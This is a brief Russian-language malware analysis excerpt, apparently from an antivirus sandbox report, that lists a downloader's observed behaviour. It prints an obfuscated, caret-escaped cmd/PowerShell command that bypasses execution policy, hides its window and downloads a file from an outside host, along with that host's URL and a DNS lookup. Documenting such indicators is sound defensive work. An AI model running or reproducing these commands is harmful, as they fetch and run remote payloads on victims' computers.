Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwe^r^S^hEL^l^.^e^Xe -eXeCUtIO^np^oli^c^Y^ ByPASs^ -^NOPRoFIle ^-^wiNDoWStyLE^ ^hidDEN^ ^(nEw^-^OBjE^CT ^SyST^eM^.nEt.WEbcLI^enT)^.DoWnLOaDfILe(^'http://www.zonedopesa.top/read.p...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "POwe^r^S^hEL^l^.^e^Xe -eXeCUtIO^np^oli^c^Y^ ByPASs^ -^NOPRoFIle ^-^wiNDoWStyLE^ ^hidDEN^ ^(nEw^-^OBjE^CT ^SyST^eM^.nEt.WEbcLI^enT)^.DoWnLOaDfILe(^'http://www.zonedopesa.top/read.p...' (со скрытым окном)